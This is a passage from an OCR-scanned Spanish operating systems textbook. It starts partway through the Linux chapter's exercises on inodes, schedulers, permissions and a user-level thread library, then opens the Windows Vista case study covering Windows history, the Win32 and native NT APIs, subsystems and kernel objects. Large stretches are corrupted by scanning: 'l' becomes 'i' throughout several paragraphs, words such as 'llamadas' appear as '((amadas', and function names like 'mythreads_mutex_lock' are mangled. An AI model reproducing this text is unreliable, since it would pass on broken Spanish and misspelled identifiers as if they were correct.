nes de bloques indirectos sencillos, dobles y triples. Si cada uno de estos bloques contiene 256 di¬ 
recciones de disco, ¿cuál es el tamaño del archivo más grande que se puede manejar, suponiendo 
que un bloque de disco sea de 1 K B ? 

37. Cuando se lee un nodo-i del disco durante el proceso de abrir un archivo, se coloca en una tabla de 
nodos-i en la memoria. Esta tabla tiene algunos campos que no están presentes en el disco. U no de 
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ellos es un contador que lleva la cuenta del número de veces que se ha abierto el nodo-i. ¿Por qué 
se necesita este campo? 

38. En plataformas con varias CPUs, Linux mantiene una estructura cola de ejecución (runqueue) para 
cada CPU. ¿Es esto una buena ida? Explique su respuesta. 

39. Los hilos pdflush se pueden despertar en forma periódica para escribir en el disco páginas muy an¬ 
tiguas (más de 30 segundos). ¿Por qué es esto necesario? 

40. Después de que falla el sistema y se reinicia, por lo general se ejecuta un programa de recuperación. 
Suponga que este programa descubre que la cuenta de vínculos en el nodo-i de un disco es de 2, pe¬ 
ro sólo hay una entrada de directorio que hace referencia al nodo-i. ¿Puede corregir el problema? 
De ser así, ¿cómo lo haría? 

41. Haga una conjetura sobre cuál llamada al sistema de Linux es más rápida. 

42. ¿Es posible desvincular un archivo que nunca ha sido vinculado? ¿Qué ocurre? 

43. Con base en la información presentada en este capítulo, si se colocara un sistema de archivos ext2 
de Linux en un disco flexible de 1.44 M byte, ¿cuál es la cantidad máxima de datos de archivos de 
usuario que se podría almacenar en el disco? Suponga que los bloques de disco son de 1 KB. 

44. En vista de todo el problema que pueden ocasionar los estudiantes si llegan a ser superusuarios, ¿por 
qué existe este concepto en primer lugar? 

45. U n profesor comparte archivos con sus estudiantes al colocarlos en un directorio con acceso públi¬ 
co en el sistema Linux del departamento de ciencias computacionales. Un día se da cuenta de que 
un archivo que colocó ahí el día anterior se quedó con permiso de escritura para todo el mundo. 
Cambia los permisos y verifica que el archivo sea idéntico a su copia maestra. El siguiente día des¬ 
cubre que el archivo se ha modificado. ¿Cómo pudo haber ocurrido esto y cómo se hubiera podido 
evitar? 

46. Linux admite un sistema llamado fsuid. A diferencia de setuid, que otorga al usuario todos los per¬ 
misos del id efectivo asociado con un programa que está ejecutando, fsuid otorga al usuario que 
ejecuta el programa permisos especiales sólo con respecto al acceso a los archivos. ¿Por qué es útil 
esta característica? 

47. Escriba un shell simplificado que permita iniciar comandos simples. También debe permitir iniciar¬ 
los en segundo plano. 

48. Utilice lenguaje ensamblador y llamadas al BIOS para escribir un programa que se inicie a sí mis¬ 
mo desde un disco flexible en una computadora clase Pentium. El programa debe utilizar llamadas 
al BIOS para leer el teclado y hacer eco de los caracteres escritos, para demostrar que se está ejecu¬ 
tando. 

49. Escriba un programa de terminal tonta para conectar dos computadoras Linux a través de los puertos 
seriales. Use las llamadas de administración de terminales de POSIX para configurar los puertos. 

50. Escriba una aplicación cliente servidor que por petición transfiera un archivo extenso mediante soc- 
kets. Vuelva a implementar la misma aplicación utilizando memoria compartida. ¿Qué versión es¬ 
pera que tenga un mejor rendimiento? ¿Por qué? Realice mediciones de rendimiento con el código 
que escribió y utilizando distintos tamaños de archivos. ¿Cuáles son sus observaciones? ¿Qué cree 
usted que ocurra dentro del kernel de Linux que produzca este comportamiento? 
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51. I triplemente una biblioteca básica de subprocesos a nivel de usuario que se ejecute encima de Linux. 
La API de la biblioteca debe contener llamadas a funciones como tnythreads_init, mythreads- 
_create, mythreads_]Oin, niythreads_exit, mythreads_yield, [iiythreads_self y tal vez unas 
cuantas más. Después implemente estas variables de sincronización para permitir operaciones con¬ 
currentes seguras: mythreads_iiiutex_init, [iiythreads_mutex_lock, tnythreads_mutex_unlock. 
Antes de iniciar, defina con claridad la API y especifique la semántica de cada una de las llamadas. 
Luego implemente la biblioteca a nivel de usuario con un planificador preferente por turno rotativo 
(round-robin) apropiativo. También necesitará escribir una o más aplicaciones multihilo que utili¬ 
cen su biblioteca para poder probarla. Por último, reemplace el mecanismo de planificación apro- 
piativa con otro que se comporte como el planificador 0(1) de Linux 2.6 descrito en este capítulo. 
Compare el rendimiento que recibe(n) su(s) aplicación(es) al utilizar cada uno de los planificadores. 
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CASO DE ESTUDIO 2; 
WINDOWS VISTA 


Windows es un sistema operativo moderno que se ejecuta en ias PCs de escritorio de consumido¬ 
res y negocios, y en servidores empresariaies. La versión de escritorio más reciente es Windows 
Vista. La versión de servidor de Windows Vista se conoce como Windows Server 2008. En este 
capítuio examinaremos varios aspectos de Windows Vista; empezaremos con una breve historia y 
después pasaremos a su arquitectura. M ás adeiante anaiizaremos ios procesos, ia administración de 
ia memoria, ei uso de caché, ia E/S, ei sistema de archivos y, por úitimo, ia seguridad. 


11.1 HISTORIA DE WINDOWS VISTA 

Ei desarroiio dei sistema operativo M icrosoft Windows para ias PCs, ai iguai que ios servidores, se 
puede dividir en tres eras: MS-DOS, Windows basado en M S-DOS y Windows basado en NT. 

Técnicamente, cada uno de estos sistemas es muy distinto a ios otros. Cada sistema dominó duran¬ 
te distintas décadas en ia historia de ia computadora personai. La figura 11-1 muestra ias fechas de 
iiberación de ias versiones mayores dei sistema operativo de M icrosoft para computadoras de es¬ 
critorio (omitimos ia popuiar versión M icrosoft Xenix basada en UNIX, que M icrosoft vendió a 
Santa Cruz Operation (SCO) en 1987). A continuación presentaremos un bosquejo sintetizado de 
ias eras que se muestran en ia tabia. 
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Año 

MS-DOS 

Windows basado 

en MS-DOS 

Windows basado 

en NT 

Observaciones 

1981 

MS-DOS 1.0 



Liberación inicial para la IBM PC 

1983 

MS-DOS 2.0 



Soporte para la PC/XT 

1984 

MS-DOS 3.0 



Soporte para la PC/AT 

1990 


Windows 3.0 


Diez millones de copias en 2 años 

1991 

MS-DOS 5.0 



Se agregó la administración de 

la memoria 

1992 


Windows 3.1 


Se ejecuta sólo en la 286 y 
posteriores 

1993 



Windows NT 3.1 


1995 

MS-DOS 7.0 

Windows 95 


MS-DOS incrustado en Win 95 

1996 



Windows NT 4.0 


1998 


Windows 98 



2000 

MS-DOS 8.0 

Windows Me 

Windows 2000 

Win Me era inferior a Win 98 

2001 



Windows XP 

Reemplazó a Windows 98 

2006 



Windows Vista 



Figura 11-1. Liberaciones de versiones mayores en ia historia de ios sistemas opera¬ 
tivos de M icrosoft para ias PCs de escritorio. 


11.1.1 1980: MS-DOS 

A principios de la década de 1980, IBM (que en ese momento era la empresa de computadoras más 
grande y poderosa en el mundo) estaba desarrollando una computadora personal basada en el mi¬ 
croprocesador Intel 8088. Desde mediados de la década de 1970, M icrosoft se convirtió en el pro¬ 
veedor principal del lenguaje de programación BASIC para las microcomputadoras de 8 bits 
basadas en el 8080 y el Z-80. Cuando IBM pidió a M icrosoft una licencia de BASIC para la nueva 
IBM PC, M icrosoft estuvo de acuerdo y sugirió a IBM que se pusiera en contacto con Digital Re¬ 
search para obtener una licencia de su sistema operativo CP/M , (en ese entonces M icrosoft no es¬ 
taba en el negocio de los sistemas operativos). IBM lo hizo, pero el presidente Cari Kildall de 
Digital Research estaba demasiado ocupado para reunirse con ellos, por lo que IBM regresó con 
M icrosoft. Poco después, M icrosoft compró un clon de CP/M a una empresa local, SeattIe Compu¬ 
ter Products, lo portó a la IBM PC y le otorgó una licencia a IBM . Después le cambió el nombre a 
MS-DOS 1.0 (M icroSoft Disk Operating System, Sistema operativo en disco de M icrosoft) y lo in¬ 
cluyó con la primera IBM PC en 1981. 

M S-DOS era un sistema operativo de línea de comandos, 16 bits, modo real y un solo usuario, 
que consistía en 8 K B de código residente en memoria. Durante la siguiente década, la PC y M S- 
DOS continuaron su evolución incorporando más características y herramientas. Para 1986, cuan¬ 
do IBM construyó la PC/AT con base en el Intel 286, M S-DOS había crecido a 36 KB pero seguía 
siendo un sistema operativo operado por línea de comandos y capaz de ejecutar una aplicación a 
la vez. 
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11.1.2 1990: Windows basado en M S-DOS 

Inspirado por la interfaz gráfica de usuario délos sistemas de investigación del Stanford Research Ins- 
titute y Xerox PARC, y por su progenie comercial, las computadoras Lisa y Macintosh de 
Apple, M icrosoft decidió proveer a M S-DOS con una interfaz gráfica de usuario, a la que deno¬ 
minó Windows. Las primeras dos versiones de Windows (1985 y 1987) no tuvieron mucho éxi¬ 
to, en parte debido a las limitaciones de hardware de la PC disponible en ese momento. En 1990, 
M icrosoft liberó Windows 3.0 para el Intel 386, y vendió más de un millón de copias en seis 
meses. 

Windows 3.0 no era un verdadero sistema operativo, sino un entorno gráfico que se construyó 
encima de MS-DOS, que aún tenía el control déla máquina y el sistema de archivos. Todos los pro¬ 
gramas se ejecutaban en el mismo espacio de direcciones, y un error en cualquiera de ellos podía 
provocar que todo el sistema se detuviera. 

En agosto de 1995 se liberó Windows95, que contenía muchas de las características de un sis¬ 
tema operativo completo, incluyendo memoria virtual, administración de procesos y multiprogra- 
mación; además introdujo las interfaces de programación de 32 bits. Sin embargo le faltaba 
seguridad y ofrecía un aislamiento pobre entre las aplicaciones y el sistema operativo. Por ende, los 
problemas con la inestabilidad continuaron aun con las liberaciones subsecuentes de Windows 98 
y Windows Me, donde M S-DOS seguía ejecutando código ensamblador de 16 bits en el corazón 
del sistema operativo Windows. 


11.1.3 2000: Windows basado en NT 

A finales de la década de 1980, M icrosoft se dio cuenta de que continuar el desarrollo de un siste¬ 
ma operativo con M S-DOS como componente central no era la mejor forma de hacerlo. El hard¬ 
ware de la PC seguía aumentando su velocidad y capacidad. Tarde o temprano, el mercado de las 
PCs entraría en conflicto con los de los servidores empresariales y las estaciones de trabajo de 
escritorio, que UNIX dominaba. A M icrosoft también le preocupaba que la familia de micropro¬ 
cesadores Intel tal vez no seguiría siendo competitiva, debido a que las arquitecturas RISC ya re¬ 
presentaban un reto. Para lidiar con esto, Microsoft reclutó un grupo de ingenieros de DEC 
dirigido por Dave Cutler, uno de los diseñadores clave del sistema operativo VM S de DEC. Cu¬ 
tí er fue designado para desarrollar un nuevo sistema operativo de 32 bits con la intención de im- 
plementar OS/2, la A Pl de sistema operativo que M icrosoft estaba desarrollando en conjunto con 
IBM en ese entonces. En los documentos de diseño originales, el equipo de Cutler llamó al sis¬ 
tema NT OS/2. 

El sistema de Cutler se llamó NT por Nueva Tecnología (y también debido a que el procesador 
de destino original era el nuevo Intel 860, con el nombre en clave N10). NT se diseñó de manera que 
pudiera portarse entre distintos procesadores, con énfasis en la seguridad y confiabilidad, y que fue¬ 
ra compatible con las versiones de Windows basadas en DOS. En la figura 11-2 se muestra el traba¬ 
jo desarrollado por Cutieren DEC, donde hay más que una similitud pasajera entre el diseño de NT 
y el de VM S y los otros sistemas operativos diseñados por él. 


816 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


Año 

Sistema operativo de DEC 

Características 

1973 

RSX-11M 

16 bits, multiusuario, tiempo reai, intercambios 

1978 

VAX/VMS 

32 bits, memoria virtuai 

1987 

VAXELAN 

Tiempo reai 

1988 

PRISM/Mica 

Se canceió a favor de MIPS/Uitrix 


Figura 11-2. Los sistemas operativos de DEC desarroiiados por Dave Cutier. 


Cuando los ingenieros de DEC (y más tarde sus abogados) vieron la similitud entre NT y VM S 
(y también con su sucesor M ICA, que nunca se liberó), se produjo una discusión entre DEC y M i- 
crosoft en relación con el uso de la propiedad intelectual de DEC. El problema se resolvió en últi¬ 
ma instancia fuera de la corte. A demás, M icrosoft estuvo de acuerdo en dar soporte de NT para la 
DEC Alpha durante cierto periodo. Sin embargo, nada de esto fue suficiente para salvar a DEC de 
su obsesión con las minicomputadoras y el desdén por las computadoras personales, tipificado por 
el comentario en 1977 de Ken OIsen, fundador de DEC: "No hay razón por la que alguien desearía 
una computadora en su [sic] hogar". En 1998, lo que quedaba de DEC se vendió a Compaq, quien 
más tarde fue comprada por Hewlett-Packard. 

Los programadores que sólo están familiarizados con UNIX encuentran que la arquitectura de 
NT es bastante distinta. Esto no se debe sólo a la influencia de VM S, sino también a las diferencias 
en los sistemas de cómputo que eran comunes en la época de su diseño. UNIX se diseñó por prime¬ 
ra vez en la década de 1970 para sistemas de intercambio con un solo procesador de 16 bits, con 
poca memoria, en donde el proceso era la unidad de concurrencia y composición, y fork/exec eran 
operaciones que no requerían muchos recursos (ya que los sistemas de intercambio copian con fre¬ 
cuencia los procesos en el disco de todas formas). NT se diseñó a principios de la década de 1990, 
cuando eran comunes los sistemas de multiprocesador, de 32 bits, varios megabytesy memoria vir¬ 
tual. En NT, los hilos son la unidad de concurrencia, las bibliotecas dinámicas son las unidades de 
composición y las operaciones fork/exec seimplementan mediante una sola operación para crearon 
proceso y ejecutar otro programa sin tener que realizar primero una copia. 

La primera versión de Windows basado en NT (Windows NT 3.1) se liberó en 1993. Se llamó 
3.1 para corresponder con el entonces actual Windows 3.1 para el consumidor. El proyecto conjun¬ 
to con IBM se había hundido, y aunque aún se daba soporte a las interfaces con OS/2, las interfa¬ 
ces primarias eran extensiones de 32 bits de lasAPIs de Windows, conocidas como Win32. Entre 
el tiempo en que se inició NT y el tiempo en que se realizó su primer embarque, se había liberado 
Windows 3.0 y tuvo mucho éxito comercial. También podía ejecutar programas Win32, pero me¬ 
diante el uso de la biblioteca de compatibilidad Win32s. 

Al igual que la primera versión de Windows basado en M S-DOS, Windows basado en NT no 
tuvo éxito en un principio. NT requería más memoria, había pocas aplicaciones disponibles de 32 
bits y las incompatibilidades con los drivers de dispositivos y las aplicaciones provocaron que mu¬ 
chos clientes prefirieran el Windows basado en M S-DOS, que M icrosoft seguía mejorando: liberó 
Windows 95 en 1995. Este sistema operativo proveía interfaces de programación nativas de 32 bits 
como NT, pero una mejor compatibilidad con el software y las aplicaciones de 16 bits existentes. 
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No sorprende que el éxito anticipado de NT haya estado en ei mercado de ios servidores, en com¬ 
petencia con VMS y NetWare. 

NT cumpiió sus objetivos de portabiiidad. Las versiones adicionaies que se iiberaron en 1994 
y 1995 agregaron soporte para ias arquitecturas M IPS (iittie-endian) y PowerPC. La primera actua- 
iización importante en NT iiegó con Windows NT 4.0 en 1996. Este sistema tenía ia potencia, se¬ 
guridad y confiabiiidad de NT, pero también tenía ia misma interfaz de usuario queei entonces muy 
popuiar Windows 95. 

La figura 11-3 muestra ia reiación de ia A Pl Win32 con Windows. Era importante tener una 
API común entre Windows basado en M S-DOS y Windows NT para que éste úitimo tuviera éxito. 

Esta compatibiiidad faciiitó de manera consi derabie para ios usuarios ia migración de Windows 
95 a NT, y ei sistema operativo se convirtió en un participante sóiido en ei mercado de ias compu¬ 
tadoras de escritorio de aito rendimiento, así como en ei de ios servidores. Sin embargo, ios Chen¬ 
tes no estaban tan dispuestos a adoptar otras arquitecturas de procesadores, y de ias cuatro con que 
Windows NT 4.0 era compatibie en 1996 (ei DEC Aipha se agregó en esa versión) sóio ei x86 (es 
decir, ia famiiia Pentium) io era de manera activa para cuando se ianzó ia siguiente versión mayor, 
Windows 2000. 



Figura 11-3. LaAPI Win32 permite ejecutar programas en casi todas las versiones de 
Windows. 


Windows 2000 representó una evoiución considerabie para NT. Las tecnoiogías ciave que se 
agregaron eran piug-and-piay (para ios consumidores que instaiaban una nueva tarjeta PCI, con lo 
cual se eliminaba la necesidad de experimentar con los jumpers), los servicios de directorio de red 
(para los clientes empresariales), administración de energía mejorada (para las portátiles) y una GUI 
mejorada (para todos). 

Debido al éxito técnico de Windows 2000, M icrosoft empezó a presionar para dejar de utilizar 
Windows 98, al mejorar la compatibilidad de aplicaciones y dispositivos de la siguiente versión de 
NT, WindowsXP. Este sistema operativo incluía una nueva apariencia más amigable para la inter¬ 
faz gráfica, para reforzar la estrategia de M icrosoft de enganchar a los consumidores para que ellos 
presionaran a que sus empleadores adoptaran sistemas con los que ya estaban familiarizados. La es¬ 
trategia fue exitosa de manera abrumadora, ya que Windows X P se instaló en cientos de millones 
de PCs durante los primeros años, lo cual permitió a M icrosoft lograr su objetivo de terminar con 
efectividad la era de Windows basado en M S-DOS. 
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Windows X P representaba una nueva realidad de desarrollo para M icrosoft, con versiones se¬ 
paradas para los clientes de escritorio y los servidores empresariales. El sistema era demasiado 
complejo como para producir versiones cliente y servidor de alta calidad al mismo tiempo. Win¬ 
dows 2003 fue la versión de servidor que complementaba el sistema operativo cliente Windows X P. 
Ofrecía soporte para el Intel Itanium de 64 bits (IA64), y su primer Service Pack agregó soporte pa¬ 
ra la arquitectura x64 deAM D, tanto en los servidores como en los equipos de escritorio. M icrosoft 
utilizó el tiempo entre las liberaciones de las versiones cliente y servidor para agregar característi¬ 
cas específicas de servidor y realizar pruebas exhaustivas enfocadas en los aspectos del sistema, 
principalmente su uso en los negocios. En la figura 11-4 se muestra la relación de las versiones 
cliente y servidor de Windows. 


Año 

Versión cliente 

Año 

Versión servidor 

1996 

Windows NT 

1996 

Windows NT Server 

1999 

Windows 2000 

1999 

Windows 2000 Server 

2001 

Windows XP 

2003 

Windows Server 2003 

2006 

Windows Vista 

2007 

Windows Server 2008 


Figura 11-4. Versiones separadas de cliente y servidor de Windows. 


M icrosoft dio seguimiento a Windows X P al embarcarse en una versión ambiciosa para desper¬ 
tar una emoción renovada entre los consumidores de PCs. El resultado fue Windows Vista y se 
completó a finales del 2006, más de cinco años después de que Windows X P se embarcara por pri¬ 
mera vez. Windows Vista se jactaba detener otro diseño de interfaz gráfica y nuevas características 
de seguridad en su interior. La mayoría de los cambios se realizaron en experiencias y herramien¬ 
tas visibles para el consumidor. Las tecnologías detrás del sistema se mejoraron en forma incre¬ 
menta!, con mucha limpieza del código y mejoras en rendimiento, escalabilidad y confiabilidad. La 
versión servidor de Vista (Windows Server 2008) salió al mercado aproximadamente un año des¬ 
pués de la versión para el consumidor. Comparte los mismos componentes básicos del sistema, co¬ 
mo el kernel, los drivers, las bibliotecas de bajo nivel y los programas con Vista. 

La historia humana de los primeros años del desarrollo de NT se relata en el libro Showstop- 
per (Zachary, 1994). El libro dice mucho sobre las personas clave involucradas, y las dificultades 
de asumir un proyecto de desarrollo de software tan ambicioso. 

11.1.4 Windows Vista 

La liberación de Windows Vista culminó el proyecto más extenso de un sistema operativo de M i- 
crosofta lafecha. Los planes iniciales eran tan ambiciosos que, dos años después de empezar su de¬ 
sarrollo, Vista se tuvo que reiniciar con un menor alcance. Los planes de basarse en gran parte en 
el lenguaje.NET C#con seguridad de tipos y recolección de basura de M icrosoft se pospusieron, 
al igual que algunas características considerables como el sistema de almacenamiento unificado 
WinFS para buscar y organizar datos desde muchas fuentes distintas. El tamaño del sistema opera¬ 
tivo completo es pasmoso: la versión original de NT de 3 millones de líneas de CIC++ que había 
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aumentado a 16 millones en NT 4, a 30 millones en Windows 2000 y a 50 millones en X P, en Vis¬ 
ta alcanzó los 70 millones de líneas. 

La mayor parte del tamaño se debe al énfasis de M icrosoft en agregar muchas nuevas caracte¬ 
rísticas a sus productos en cada versión. En el directorio system32 principal hay 1600 bibliotecas de 
vínculos dinámicos (DLLs) y 400 ejecutables (EX Es), sin incluir los demás directorios que contie¬ 
nen la multitud de applets incluidos con el sistema operativo que permiten a los usuarios navegar 
en Web, reproducir música y video, enviar correo electrónico, digitalizar documentos, organizar fo¬ 
tografías e incluso hacer películas. Ya que M icrosoft desea que los clientes cambien a las nuevas 
versiones, mantiene la compatibilidad al mantener por lo general todas las características, A PIs, ap¬ 
plets (pequeñas aplicaciones), etc., de la versión anterior. Es muy raro que se eliminen cosas. El re¬ 
sultado es que Windows crece en forma notoria de una versión a otra. La tecnología se ha mantenido 
a la par, y los medios de distribución de Windows han cambiado de disco flexible a CD, y ahora 
con Windows Vista, a DVD. 

El aumento de características y applets encima de Windows hace que las comparaciones de ta¬ 
maño significativas con otros sistemas operativos sean problemáticas, debido a que es difícil deci¬ 
dir la definición de lo que forma o no parte de un sistema operativo. En los niveles inferiores de los 
sistemas operativos hay más correspondencia, debido a que las funciones que se realizan son muy 
similares. Aun así podemos ver una gran diferencia en el tamaño deWindows. En la figura 11-5 se 
comparan los kerneis de Windows y de Linux en tres áreas funcionales clave: programación de la 
CPU, infraestructura de E/S y memoria virtual. Los primeros dos componentes son de nuevo casi 
una y medio veces más grandes en Windows, pero el componente de memoria virtual es diez veces 
más grande (debido al extenso número de características, al modelo de memoria virtual que se uti¬ 
liza y las técnicas de implementación que utilizan código de mayor tamaño con tal de obtener un 
mayor rendimiento). 


Área del kernel 

Linux 

Vista 

Programador de la CPU 

50,000 

75,000 

Infraestructura de E/S 

45,000 

60,000 

Memoria virtual 

25,000 

175,000 


Figura 11-5. Comparación de las líneas de código para ciertos módulos en modo de 
kernel en Linux y Windows (de M ark Russinovich, co-autor de M icrosoft Windows In¬ 
ternáis). 


11.2 PROGRAMACIÓN DE WINDOWSVISTA 

Es el momento de empezar nuestro estudio técnico de Windows Vista. Sin embargo, antes de entrar 
en los detalles de la estructura interna, analizaremos laA Pl de NT nativa para las llamadas al siste¬ 
ma y después el subsistema de programación Win32. A pesar de la disponibilidad de POSIX, casi 
todo el código escrito para Windows utiliza a Win32 directamente o a .NET (que a su vez se ejecu¬ 
ta encima de Win32). 
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La figura 11-6 muestra los niveles del Sistema operativo Windows. Debajo de los niveles de 
applet y de GUI de Windows están las interfaces de programación en las que se basan las aplica¬ 
ciones. Al igual que en la mayoría de los sistemas operativos, consisten en gran parte de bibliote¬ 
cas de código (DLLs) que los programas vinculan de manera dinámica para acceder a las 
características del sistema operativo. Windows también incluye varias interfaces de programación 
queseimplementan como servicios, los cuales se ejecutan como procesos separados. Las aplicacio¬ 
nes se comunican con los servicios en modo de usuario a través de llamadas a procedimientos re¬ 
motos (RPC). 



Appiets (pequeños ejecutabies de Win32) 


Servicios de NT: 
smss, isass, 
Services, winiogon, ... 

GUi (sheii32.dii, user32.dil, gdi32.dii) 

Bibliotecas dinámicas {ole32.dll, rpc.dii, ...) 

Proceso del subsistema 
(csrss) 

API del subsistema (kernel32.dll, advapi32l.dll) 

., , , APi de NT nativa, C/C-n-en tiempo de ejecución (ntdii.dii) 

VIodo de usuario 


Modo de kernel 

Nivel de kernel de NTOS {ntoskrnl.exe) 

Drivers: dispositivos, 
sistemas de archivos, 
red 

Nivel ejecutivo de NTOS (ntoskrnl.exe) 

Driver de 
la GUI 

(Win32k.sys) 

Nivel de abstracción de hardware (hal.dll) 


Figura 11-6. Los niveles de programación en Windows. 


El núcleo del sistema operativo NT es el programa en modo kernel NTOS (ntoskrnl.exe), que 
proporciona las interfaces tradicionales de llamadas al sistema, con base en las cuales se construye 
el resto del sistema operativo. En Windows, sólo los programadores en M icrosoft escriben en el ni¬ 
vel de llamadas al sistema. Todas las interfaces publicadas en modo de usuario pertenecen a perso¬ 
nalidades del sistema operativo que se implementan mediante el uso de subsistemas, los cuales se 
ejecutan encima de los niveles del NTOS. 

En un principio, NT admitía tres personalidades: OS/2, POSIX y Win32. OS/2 se descartó en 
Windows X P. POSIX también se eliminó, pero los clientes pueden obtener un subsistema POSIX 
mejorado llamado Interix como parte de los Servicios para UNIX (SFU) de M icrosoft, de manera 
que toda la infraestructura para dar soporte a POSIX permanece en el sistema. La mayoría de las 
aplicacionesWindows se escriben para utilizar Win32, aunque M icrosoft también acepta otrasAPIs. 

A diferencia de Win32, .NET no se construye como un subsistema artificial en las interfaces 
del kernel nativas de NT. En vez de ello, .NET se construye encima del modelo de programación 
Win32. Esto permite a .NET interoperar bien con los programas existentes de Win32, lo cual nun¬ 
ca fue el objetivo con los subsistemas POSIX y OS/2. La API WinFX incluye muchas de las carac¬ 
terísticas deWin32, y de hecho muchas de las funciones en la Biblioteca de la clase base de WinFX 
son simplemente envolturas alrededor de lasAPIs de Win32. Las ventajas de WinFX están relacio¬ 
nadas con la complejidad de los tipos de objetos aceptados, las interfaces consistentes simplifica- 
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das y el uso del Lenguaje común .NET en tiempo de ejecución (CLR), inciuyendo ia recoiección de 
basura. 

Como se muestra en ia figura 11-7, ios subsistemas de NT se crean a partir de cuatro compo¬ 
nentes: un proceso de subsistema, un conjunto debibiiotecas, ios ganchos en CreateProcess y ei so¬ 
porte en ei kernei. Un proceso de subsistema es en reaiidad sóio un servicio. La única propiedad 
especiai es que se inicia mediante ei programa smss.exe (administrador de sesión) (ei programa i ni- 
ciai en modo de usuario que NT inicia) en respuesta a una petición de CreateProcess en Win32 o 
en iaAPI correspondiente en un subsistema distinto. 


Proceso del programa 


Bibliotecas del 
subsistema 


Biblioteca en tiempo de 
ejecución del sistema 
(gancho de CreateProcess) 


Proceso del subsistema 


API de NT nativa, c/c ++ en tiempo de ejecución 


Modo de usuario 
Modo de kernei 


Servicios del 
sistema NT nativo 


Llamada a procedimiento 
local (LPC) 


Soporte del kernei 
para el subsistema 

Ejecutivo de NTOS 


Figura 11-7. Los componentes que se utilizan para crear subsistemas de NT. 

Ei conjunto de bibiiotecas impiementa funciones dei sistema operativo de mayor nivei especí¬ 
ficas para ei subsistema, y contiene i as rutinas de resguardo (stub) que se comunican entre ios pro¬ 
cesos mediante ei subsistema (que se muestra a ia izquierda) y ei proceso dei subsistema en sí (que 
se muestra a (a derecha). Las ((amadas ai proceso dei subsistema por (o generai se (ievan a cabo me¬ 
diante ei uso de (as herramientas de LPC (Locai Procedure Caii, L(amada a procedimiento (ocai) 
en modo de kernei, que impiementan (as ((amadas a procedimientos entre un proceso y otro. 

Ei gancho en CreateProcess de Win32 detecta ei subsistema requerido por cada programa ai 
anaiizar (a imagen binaria. Después pide a smss.exe que empiece ei proceso crss.exede( subsiste¬ 
ma (en caso de que no esté ya en ejecución). Luego, ei proceso dei subsistema asume (a responsa- 
biiidad de cargar ei programa. La impiementación de otros subsistemas tiene un gancho simi(ar(por 
ejempio, en (a ((amada ai sistema exec en POSIX). 

Ei kernei de NT se diseñó para tener muchas herramientas de propósito generai que se puedan 
utiiizar para escribir subsistemas específicos dei sistema operativo. Pero también hay código espe¬ 
ciai que debe agregarse para impiementar cada subsistema en forma correcta. Como ejempios, (a 
((amada ai sistema nativa NtcreateProcess impiementa (a dupiicación de procesos como soporte 
para (a ((amada ai sistema fork de POSIX, y el kernei impiementa un tipo específico de tabla de 
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cadenas para Win32 (conocidas como átomos), la cual permite compartir cadenas de sólo lectura 
con eficiencia entre un proceso y otro. 

Los procesos del subsistema son programas nativos de NT que utilizan las llamadas al sistema 
nativas que proporcionan el kernel de NT y los servicios básicos, como smss.exe y lsass.exe (admi¬ 
nistración de la seguridad local). Las llamadas nativas al sistema incluyen herramientas entre los 
procesos para administrar direcciones virtuales, hilos, manejadores y excepciones en los procesos 
que se crean para ejecutar programas escritos para utilizar un subsistema específico. 

11.2.1 La Interfaz de programación de aplicaciones de NT nativa 

Al igual que todos los demás sistemas operativos, Windows Vista tiene un conjunto de llamadas al 
sistema que puede realizar. En Windows Vista, estas llamadas se implementan en el nivel ejecutivo 
deNTOS que se ejecuta en modo kernel. M icrosoft ha publicado muy pocos detal les sobre estas lla¬ 
madas nativas al sistema. Los programas de menor nivel que se envían como parte del sistema ope¬ 
rativo (en su mayor parte, servicios y los subsistemas) utilizan estas llamadas en forma interna, así 
como los drivers de los dispositivos en modo de kernel. Las llamadas al sistema nativas de NT en 
realidad no cambian mucho de una versión a otra, pero M icrosoft optó por no hacerlas públicas pa¬ 
ra que las aplicaciones escritas para Windows se basen en Win32, y por lo tanto sea más probable 
que funcionen tanto en los sistemas Windows basados en MS-DOS como con los sistemas Windows 
basados en NT, ya que laAPI Win32 es común para ambos. 

La mayoría de las llamadas al sistema nativas de NT operan sobre objetos en modo de kernel 
de un tipo u otro, incluyendo archivos, procesos, hilos, tuberías, semáforos, etcétera. En la figura 
11-8 se muestra una lista de algunas de las categorías comunes de objetos en modo de kernel sopor¬ 
tados por NT en WindowsVista. M ás adelante, cuando analicemos el administrador de objetos, pro¬ 
porcionaremos más detalles sobre los tipos de objetos específicos. 


Categoría de objetos 

Ejemplos 

Sincronización 

Semáforos, mutexes, eventos, puertos i PC, coias de compieción de E/S 

E/S 

Archivos, dispositivos, drivers, temporizadores 

Programa 

Trabajos, procesos, hiios, secciones, tokens 

GUI de Win32 

Escritorios, devoiución de iiamadas de apiicaciones 


Figura 11.8. Categorías comunes de tipos de objetos en modo de kernel. 

Algunas veces, el uso del término objeto en relación con las estructuras de datos manipuladas 
por el sistema operativo puede ser confuso, debido a que se confunde con orientado a objetos. Los 
objetos del sistema operativo proporcionan ocultamiento y abstracción de datos, pero carecen de al¬ 
gunas de las propiedades más básicas de los sistemas orientados a objetos, como la herencia y el 
polimorfismo. 

En laAPI nativa de NT hay llamadas disponibles para crear nuevos objetos en modo de kernel 
o acceder a los objetos existentes. Cada llamada para crear o abrir un objeto devuelve un resultado 
conocido como manejador al proceso que hizo la llamada. Después se puede utilizar el manejador 
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para realizar operaciones sobre el objeto. Los mane]adores son específicos para el proceso que los 
creó. En general, los mane]adores no se pueden pasar de manera directa a otro proceso y utilizarse 
para hacer referencia al mismo objeto. Sin embargo, y bajo ciertas circunstancias, es posible dupli¬ 
car un manejador en la tabla de manejadores de otros procesos de manera protegida, con lo cual se 
permite a los procesos compartir el acceso a los objetos, aun si éstos no son accesibles en el espa¬ 
cio de nombres. El proceso que duplique cada manejador debe tener manejadoras tanto para el pro¬ 
ceso de origen como el de destino. 

Cada objeto tiene asociado un descriptor de seguridad, el cual indica con detalle quién sí y 
quién no puede realizar ciertos tipos de operaciones en el objeto, con base en el acceso solicitado. 
Cuando se duplican manejadoras entre procesos, es posible agregar nuevas restricciones de acceso 
específicas para el manejador duplicado. De esta forma, un proceso puede duplicar un manejador 
de lectura-escritura y convertirlo en una versión de sólo lectura en el proceso de destino. 

No todas las estructuras de datos creadas por el sistema son objetos, y no todos éstos son obje¬ 
tos en modo de kernel. Los únicos que son verdaderos objetos en modo dekernel son los que se ne¬ 
cesitan denominar, proteger o compartir en cierta forma. Por lo general, estos objetos en modo de 
kernel representan cierto tipo de abstracción de programación que se implementa en el kernel. Ca¬ 
